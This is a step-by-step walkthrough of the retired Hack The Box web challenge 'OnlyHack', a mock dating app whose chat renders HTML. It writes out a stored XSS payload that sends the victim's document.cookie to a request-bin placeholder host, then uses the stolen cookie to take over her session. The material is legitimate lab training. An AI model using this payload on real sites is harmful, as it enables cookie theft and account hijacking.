Table of contents
This walkthrough will guide step by step of how own the OnlyHack challenge of Hack The Box.
Information of the Challenge
Description: Dating and matching can be exciting especially during Valentine's, but it’s important to stay vigilant for impostors. Can you help identify possible frauds?
Difficulty: 🟢 Very Easy
Platform: Hack The Box
Category: Web
Points: 0 (Retired)
Link: https://app.hackthebox.com/challenges/onlyhack
Complete the Challenge
First we need to go on the target IP on our browser, and we will see this:
How we don’t have any account we will need to click on Sing Up Now. And fill all the requirements:
When you register you will see cards of people like “Tinder” and we need to accept Renata .
She will write us about how is it going.
Let's try to send her a simple HTML payload with <h1> tag and see how the chat behaves.
We notice that the chat renders the HTML, so let's try sending a simple XSS payload to steal her cookie. Since the challenge operates over the Internet, the easiest way to capture the request is to create a Request Bin and use the bin's address in our payload.
<script>document.location='{URL_REQUEST_BIN}?c='+document.cookie</script>
After sending the payload, we refresh our bin and notice two requests, one due to our browser rendering the XSS, so we inspect and grab the cookie from the request that does not match ours.
And now we only need to change our cookie for the Renata cookie and then we could see all his DM’s.